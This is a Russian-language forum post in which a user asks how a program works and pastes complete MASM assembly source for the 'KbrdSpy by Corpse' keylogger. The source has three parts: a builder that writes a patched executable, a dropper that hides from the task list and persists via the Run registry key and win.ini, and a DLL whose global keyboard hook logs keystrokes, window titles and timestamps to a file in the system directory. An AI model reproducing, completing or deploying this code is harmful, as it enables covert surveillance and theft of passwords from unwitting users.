Помагите решить такую траблу :

Имеются 3 исходника main.asm ,sys98exe.asm ,sys98dll.asm ;хотя названия вообщем тне важны файлы приведу ниже ,а требуется мне понять
как эти выдумщики замутили вот такую вот гадость-->
У в откомпилироанном виде один ЕХЕ , но потом он сам каким то образом мутит еще ЕХЕ , а кнему еще и та дллка клеится!!!

Я вот ихочу узнать как это у них все получается програмно

ПОМОГИТЕ ПЛИИЗЗЗ!!!

main.asm

.486
.model flat,stdcall
option casemap:none

include d:\program\masm\bin\include\windows.inc
include d:\program\masm\bin\include\user32.inc
include d:\program\masm\bin\include\kernel32.inc
includelib d:\program\masm\bin\lib\user32.lib
includelib d:\program\masm\bin\lib\kernel32.lib
include d:\program\masm\bin\include\comdlg32.inc
includelib d:\program\masm\bin\lib\comdlg32.lib
include d:\program\masm\bin\include\advapi32.inc
includelib d:\program\masm\bin\lib\advapi32.lib

DlgProc PROTO :DWORD,:DWORD,:DWORD,:DWORD

.const
IDC_BUTTON equ 3001
IDC_BUTTON1 equ 3008
IDC_EXIT equ 3002
IDC_EDIT equ 3005
IDC_CHECKBX equ 2021
MAXSIZE equ 26

.data
DlgName db "MD",0
AppName db "KbrdSpy by Corpse тестовая версия.",0
buffer777 db MAXSIZE dup (0)
filepatch db 4608 dup (0) ;место для патча
filepatch1 db 0C7h,05h,6Fh,46h,40h,00h,00h,00h,00h,00h,0C7h,05h,73h,46h,40h,00h,00h,00h,00h,00h,0C7h,05h,77h,46h,40h,00h,00h,00h,00h,00h,10 dup (90h), 0E9h,0C4h,84h,0FFh,0FFh
tt5 db 0C6h,05h,0A4h,10h,40h,00h,75h,0
cst2 db "sys98.exe",0
mess1 db "Имя файла должно быть 1-12 символов",0ah,0dh,"(Только в пробной версии)",0
cmplt db "Шпион создан.",0
aboutmsg db "Пробная версия.",0ah,0dh,"5 августа 2002 г.",0

.data?
hFile HANDLE ?
hInstance HINSTANCE ?
.code
start:
invoke GetModuleHandle, NULL
mov hInstance,eax

invoke DialogBoxParam, hInstance, ADDR DlgName,NULL,addr DlgProc,NULL
invoke ExitProcess,eax

DlgProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
.IF uMsg==WM_COMMAND
mov eax,wParam
.IF lParam !=0
mov edx,wParam
shr edx,16
.if dx==BN_CLICKED
.IF ax==IDC_BUTTON
invoke GetDlgItemTextA,hWnd,IDC_EDIT,ADDR buffer777,200
.if eax>0ch
invoke MessageBox,NULL,ADDR mess1,ADDR AppName,MB_ICONWARNING
ret
.elseif eax==0
invoke MessageBox,NULL,ADDR mess1,ADDR AppName,MB_ICONWARNING
ret
.endif

mov edi,offset buffer777
mov esi,offset filepatch1
add esi,6
mov edx,[edi]
mov [esi],edx
add edi,4
add esi,10
mov edx,[edi]
mov [esi],edx
add edi,4
add esi,10
mov edx,[edi]
mov [esi],edx
invoke IsDlgButtonChecked,hWnd,IDC_CHECKBX
.if eax!=BST_CHECKED
add esi,4
mov ecx,7
mov edi,offset tt5
xchg edi,esi
rep movsb
.endif
invoke _lcreat, addr cst2, 4
mov hFile,eax
invoke _lwrite, hFile,ADDR filepatch,4608
invoke _llseek,hFile, 0f0fh,0
invoke _lwrite, hFile,ADDR filepatch1,45
invoke CloseHandle,hFile
invoke MessageBox,NULL,ADDR cmplt,ADDR AppName,MB_ICONWARNING
call ExitProcess
.ELSEIF ax==IDC_EXIT
call ExitProcess
.ELSEIF ax==IDC_BUTTON1
invoke MessageBox,NULL,ADDR aboutmsg,ADDR AppName,MB_ICONWARNING
ret
.ENDIF
.ENDIF
.ENDIF
.ELSE
mov eax,FALSE
ret
.ENDIF
mov eax,TRUE
ret
DlgProc endp
end start

sys98exe.asm

.486
.model flat,stdcall
option casemap:none
include d:\program\masm\bin\include\winmm.inc
include d:\program\masm\bin\include\windows.inc
include d:\program\masm\bin\include\masm32.inc
include d:\program\masm\bin\include\user32.inc
include d:\program\masm\bin\include\kernel32.inc
include d:\program\masm\bin\include\advapi32.inc
includelib d:\program\masm\bin\lib\user32.lib
includelib d:\program\masm\bin\lib\kernel32.lib
includelib d:\program\masm\bin\lib\masm32.lib
includelib d:\program\masm\bin\lib\advapi32.lib
includelib d:\program\masm\bin\lib\winmm.lib

WinMain PROTO :DWORD,:DWORD,:DWORD,:DWORD

.DATA
dllplace db 10240 dup (0) ; dll!
errormsg db "ERROR",0dh,0ah,0
AppName db "winsys98",0
ClassName db "sysClass",0
fnini db "win.ini",0
kernel32 db "kernel32.dll", 0
func db "RegisterServiceProcess", 0
arunknm db "Software\Microsoft\Windows\CurrentVersion\Run\",0
znak db "winsys98",0
exefile db "sys98.exe" ,0
dllfile db "sys98.dll" ,0
logfile db "shelzlog.txt" ,0
slash db 5ch,0
IconName db "sysIcon",0
funcKEY db "CorpseProc",0
crps1 db "run",0
crps3 db "windows",0


.DATA?
hInstance dd ?
CommandLine dd ?
pKey dd ?
d576 dd ?
cst2 db 400h dup(?)
cst8 db 400h dup(?)
d577 dd ?
cmd dd ?
hookC dd ?
DW_SIZE EQU 4
DWordSize dd ?
Temp dd ?
WinDir db 370h dup(?)
cst66 db 400h dup(?)


.CODE
start:
mov [esp+4],56h
invoke FindWindow,0,addr AppName
byte 83h
word 00F8h
jnz exitt
mov d576,0
mov hookC,0
invoke GetModuleHandle, ADDR kernel32
word 0C00Bh
jz dalsh
invoke GetProcAddress, eax, ADDR func
word 0C00Bh
jz dalsh
dword 0D0FF006A016Ah
dalsh:
invoke GetSystemDirectory , addr WinDir, sizeof WinDir
invoke lstrcat,addr WinDir,addr slash
push offset WinDir
call gll3
push offset logfile
call gll3
invoke lstrcpy, addr cst8, addr WinDir
invoke lstrcat, addr cst8, addr dllfile
mov edi,1
cmp edi,0
je winini
invoke WritePrivateProfileString,ADDR crps3,ADDR crps1,ADDR exefile,ADDR fnini
winini:
invoke RegCreateKey, HKEY_LOCAL_MACHINE,addr arunknm, addr pKey
.IF eax == 0
invoke RegSetValueEx, pKey, addr znak, NULL, REG_SZ, addr exefile, sizeof exefile
.IF (eax != 0)
invoke _lopen, addr cst2, 1
mov cmd,eax
.IF eax == (-1)
invoke _lcreat, addr cst2, 4
mov cmd,eax
.ELSE
call ff2
.ENDIF
.IF cmd != (-1)
invoke _lwrite, cmd, addr errormsg, sizeof errormsg
invoke _lclose, cmd
.ENDIF
.ENDIF
.ELSE
invoke _lopen, addr cst2, 1
mov cmd,eax
.IF eax == (-1)
invoke _lcreat, addr cst2, 4
mov cmd,eax
.ELSE
call ff2
.ENDIF
.IF cmd != (-1)
invoke _lwrite, cmd, addr errormsg, sizeof errormsg
invoke _lclose, cmd
.ENDIF
.ENDIF
invoke RegCloseKey, pKey
invoke lstrcat,addr WinDir,addr exefile
invoke GetModuleFileName,NULL,addr cst66,sizeof cst66
invoke CopyFile,addr cst66,addr WinDir,FALSE
invoke _lcreat, addr cst8, 0
mov cmd,eax
.IF cmd != (-1)
invoke _lwrite, cmd, addr dllplace,10240
invoke _lclose, cmd
.ENDIF
invoke GetModuleHandle, NULL
mov hInstance,eax
invoke GetCommandLine
mov CommandLine,eax
invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT
exitt: invoke ExitProcess,eax
ff2:
invoke _llseek, cmd, 0, 2
byte 0c3h
byte 0cch
WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
LOCAL wc:WNDCLASSEX
LOCAL msg:MSG
LOCAL hwnd:HWND
LOCAL Ver: OSVERSIONINFO
mov wc.cbSize,SIZEOF WNDCLASSEX
mov wc.style, CS_HREDRAW or CS_VREDRAW
mov wc.lpfnWndProc, OFFSET WndProc
mov wc.cbClsExtra,NULL
mov wc.cbWndExtra,NULL
push hInstance
pop wc.hInstance
mov wc.hbrBackground,COLOR_WINDOW
mov wc.lpszMenuName,NULL
mov wc.lpszClassName,OFFSET ClassName
invoke LoadIcon,hInstance,addr IconName
mov wc.hIcon,eax
mov wc.hIconSm,eax
invoke LoadCursor,NULL,IDC_ARROW
mov wc.hCursor,eax
invoke RegisterClassEx, addr wc
INVOKE CreateWindowEx,NULL,ADDR ClassName,ADDR AppName,WS_OVERLAPPEDWINDOW,500,400,100,50,NULL,NULL,hInst,NULL
mov hwnd,eax
.WHILE TRUE
invoke GetMessage, ADDR msg,NULL,0,0
.BREAK .IF (!eax)
invoke TranslateMessage, ADDR msg
invoke DispatchMessage, ADDR msg
.ENDW
mov eax,msg.wParam
ret
WinMain endp
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
.IF uMsg == WM_CREATE
invoke LoadLibrary, addr dllfile
mov d576,eax
.IF (d576 ==0)
invoke _lopen, addr cst2, 1
mov cmd,eax
.IF eax == (-1)
invoke _lcreat, addr cst2, 4
mov cmd,eax
.ELSE
call ff2
.ENDIF
.IF cmd != (-1)
invoke _lwrite, cmd, addr errormsg, sizeof errormsg
invoke _lclose, cmd
.ENDIF
invoke PostexittMessage,NULL
xor eax,eax
ret
.ELSE
invoke GetProcAddress, d576, addr funcKEY
mov d577,eax
.IF (d577 ==0)
invoke _lopen, addr cst2, 1
mov cmd,eax
.IF eax == (-1)
invoke _lcreat, addr cst2, 4
mov cmd,eax
.ELSE
call ff2
.ENDIF
.IF cmd != (-1)
invoke _lwrite, cmd, addr errormsg, sizeof errormsg
invoke _lclose, cmd
.ENDIF
invoke PostexittMessage,0
xor eax,eax
ret
.ELSE
invoke SetWindowsHookEx, 2, d577, d576, 0
mov hookC, eax
.IF (hookC == 0)
invoke _lopen, addr cst2, 1
mov cmd,eax
.IF eax == (-1)
invoke _lcreat, addr cst2, 4
mov cmd,eax
.ELSE
invoke _llseek, cmd, 0, 2
.ENDIF
nop
.IF cmd != (-1)
invoke _lwrite, cmd, addr errormsg, sizeof errormsg
invoke _lclose, cmd
.ENDIF
invoke PostexittMessage,NULL
xor eax,eax
ret
.ENDIF
.ENDIF
.ENDIF
.ELSEIF uMsg == WM_DESTROY
invoke FreeLibrary, d576
invoke UnhookWindowsHookEx, hookC
invoke PostexittMessage,NULL
xor eax,eax
ret
.ELSEIF
invoke DefWindowProc,hWnd,uMsg,wParam,lParam
ret
.ENDIF
xor eax,eax
ret
push ebp
add esp,2
byte 0c3h
WndProc endp
gll3:
pop edi
push offset cst2
call lstrcat
push edi
byte 0c3h
END start

sys98dll.asm

.386
.model flat, stdcall
option casemap :none
include d:\program\masm\bin\include\windows.inc
include d:\program\masm\bin\include\user32.inc
include d:\program\masm\bin\include\kernel32.inc
include d:\program\masm\bin\include\masm32.inc
includelib d:\program\masm\bin\lib\user32.lib
includelib d:\program\masm\bin\lib\kernel32.lib
includelib d:\program\masm\bin\lib\masm32.lib

.data
hc2 dd ?
lastkprsd db 32h dup(?)
bk65 dd ?
dlinna dd ?
dlinna7 dd ?
timehms db "hh : mm : ss",0
prbl db 20h,0
buf db 5dch dup(?)
buf3 db 3e8h dup(?)
DopStr1 db 0dh,0ah,"End write ",0
DopStr2 db 76 dup (0)
RegValue2 db "shelzlog.txt" ,0
buf1 db 5dch dup(?)
buf2 db 3e8h dup(?)
comstr9 db 1024 dup (?)
slash db 5ch,0
datetmy db "dd.MM.yyyy",0
cmd1 dd ?
dah1 db 0dh,0ah,0
crpsapp db "This log generated - KbrdSpy by Corpse",0dh,0ah,0
ctr1 db 1; :)
dkk db 50 dup(?)

.code
DLLEntry proc hInstDLL:DWORD, reason:DWORD, unused:DWORD
.IF reason == DLL_PROCESS_ATTACH
invoke GetSystemDirectory , addr comstr9, sizeof comstr9
invoke rtrim, addr comstr9, addr comstr9
invoke lstrcat,addr comstr9,addr slash
invoke lstrcat, addr comstr9, addr RegValue2
mov dlinna,0
mov dlinna7,0
mov bk65,0
mov eax, TRUE
ret
.ELSEIF reason == DLL_PROCESS_DETACH
.IF (bk65 != 0)
invoke lstrcpy, addr buf1, addr buf
mov byte ptr [ctr1],0
call CorpseProc
.ENDIF
.ENDIF
ret
DLLEntry Endp
CorpseProc proc nCode0: DWORD, wParam0: WPARAM, lParam0: LPARAM
cmp byte ptr [ctr1],0
je writetf
.IF nCode0 == HC_ACTION
mov eax, lParam0
dword 2510E8C1h
dword 00008000h
.IF (eax == 0)
mov bk65,1
.IF dlinna7 == 0
invoke GetForegroundWindow
.IF eax != 0
invoke SendMessage, eax, WM_GETTEXT, 1024, addr buf2
.ENDIF
invoke GetDateFormat, NULL, NULL, NULL, addr datetmy, addr buf3, sizeof buf3
invoke lstrcpy, addr buf, addr buf3
call ff4
invoke GetTimeFormat, NULL, TIME_FORCE24HOURFORMAT, NULL, addr timehms, addr buf3, sizeof buf3
invoke lstrcat, addr buf, addr buf3
call ff4
invoke lstrcat, addr buf, addr buf2
invoke lstrcat, addr buf, addr dah1
invoke lstrlen, addr buf
mov dlinna7, eax
.ENDIF
invoke GetKeyNameText, lParam0, addr dkk, sizeof dkk
invoke lstrcpy, addr lastkprsd, addr dkk
invoke lstrcat, addr buf, addr dkk
word 146Ah
mov edi,esp
add edi,4
invoke lstrcat, addr buf, edi
invoke lstrlen, addr dkk
add dlinna, eax
add dlinna, 3
.IF dlinna >=64h
invoke lstrcat, addr buf, addr dah1
mov eax, dlinna
add dlinna7, eax
mov dlinna,0
.ENDIF
.IF dlinna7 >=666h
invoke lstrcpy, addr buf1, addr buf
mov dlinna,0
mov dlinna7,0
call writetf
.ENDIF
mov eax,0
ret
.ENDIF
.ENDIF
invoke CallNextHookEx, hc2 ,nCode0, wParam0, lParam0
ret
byte 0c3h
writetf:
mov byte ptr [ctr1],1
invoke lstrcat, addr buf1, addr DopStr1
call ff2
call ff2
invoke _lopen, addr comstr9, OF_WRITE
mov cmd1,eax
.IF eax == (-1)
invoke _lcreat, addr comstr9, 4
mov cmd1,eax
invoke _lwrite, cmd1, addr crpsapp,40
call ff4
.ELSE
call ff4
.ENDIF
.IF cmd1 != (-1)
invoke lstrlen, addr buf1
;;;
invoke _lwrite, cmd1, addr buf1, eax
invoke _lclose, cmd1
.ENDIF
ret
ff2:
invoke lstrcat, addr buf1, addr dah1
byte 0c3h
ff3:
invoke lstrcat, addr buf1, addr buf
byte 0c3h
ff4:
invoke _llseek, cmd1, 0, 2
byte 0c3h
CorpseProc endp
End DLLEntry

А лучше ответы мыльте мне сюда плизз :emerald@mail2k.ru